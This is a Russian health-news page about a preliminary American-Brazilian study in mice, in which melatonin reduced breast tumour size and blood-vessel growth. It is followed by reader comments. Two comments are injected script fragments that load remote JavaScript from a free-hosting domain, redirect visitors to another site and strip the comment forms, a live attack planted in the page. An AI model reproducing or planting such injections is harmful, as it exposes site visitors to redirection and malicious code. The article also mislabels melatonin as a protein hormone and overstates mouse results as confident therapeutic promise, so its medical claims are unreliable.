Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сон напрямую влияет на ра...  >>  Сон напрямую влияет на рак груди
 
Обратная связь
 

Сон напрямую влияет на рак груди

Размер шрифта
14 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Предварительные результаты крупного американо-бразильского исследования указывают на то, что мелатонин – гормон, регулирующий цикл «сон-бодрствование», – может замедлять рост рака груди.

Сон напрямую влияет на рак груди

Кроме того, ученые обнаружили, что помимо тормозного влияния на канцерогенез, мелатонин может также блокировать образование новых сосудов в опухолевом очаге.

Авторы изучали на лабораторных животных влияние мелатонина на рост и развитие так называемого тройного негативного рака молочной железы, и полученные ими результаты смело можно охарактеризовать как уникальные.

Мелатонин – это белковый гормон, продуцирующийся шишковидным телом головного мозга в темное время суток. Именно это вещество делает вас сонливым перед сном и погружает в итоге в объятия морфея. Это свойство мелатонина известно давно, ученые даже создали на его основе эффективное снотворное средство.

Однако с каждым годом открываются все новые и новые интригующие грани этого гормона, и потенциальный противоопухолевый эффект является одной из таковых.

В фокусе ученых находится влияние мелатонина на ангиогенез (формирование новых кровеносных сосудов). Этот процесс запускается в опухолевой массе в ответ на гипоксию (пониженное содержание кислорода), которая развивается при достижении рака размера нескольких миллиметров. Новообразованные сосуды питают опухоль, позволяя ей расти все больше и больше.

Суть эксперимента заключалась в следующем. Мыши с раком груди были случайным образом распределены на две группы: получавшие мелатонин и не получавшие (группа контроля). Животные из первой группы получали препарат каждую ночь в течение 21 суток. Вещество вводилось в фармакологических концентрациях за час до того, как в виварии выключался свет. Время введения было выбрано не случайно: считается, что чувствительность мелатониновых рецепторов максимальна как раз-таки в ночные часы.

По истечению вышеозначенного срока авторы применили однофотонную эмиссионную компьютерную томографию, чтобы выяснить, удалось ли с помощью мелатонина снизить размер рака и уменьшилось ли количество опухолевых сосудов.

Для начала выяснилось, что мелатонин не вызвал практически никаких побочных эффектов: мыши не потеряли в весе, не стали чрезмерно сонливыми. Скорее наоборот – они демонстрировали повышенную подвижность в дневное время, но при этом абсолютно без элементов агрессии.

Касательно же терапевтического эффекта – он оказался весьма воодушевляющим: по сравнению с мышами из контрольной группы, у животных, подвергшихся воздействию мелатонина, размер опухоли и количество новообразованных сосудов значительно уменьшились.

Аналогичный эффект авторам удалось воспроизвести и in vitro (в переводе с латинского – «в стекле», то есть в данном случае – в культуре клеток).

Таким образом, учитывая, разумеется, предварительный характер полученных результатов, можно тем не менее с уверенностью утверждать – мелатонин является крайне перспективным веществом в контексте противоопухолевой терапии.

Другие материалы о женском здоровье ищите на страницах нашего одноименного специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего одна таблетка в день – в 2 раза меньше случаев рака груди!   Прогулки уменьшают риск рака груди! Сколько же гулять?   Простые ежедневные прогулки уменьшают риск рака груди   Не спите по ночам? У вас в 2 раза больше шансов получить рак груди!  
26 июня 2013Что пить, чтобы не было рака груди? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Ответы на все вопросы о раке груди
Тесты для вашей любимой груди
Чего боятся женщины с годами

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.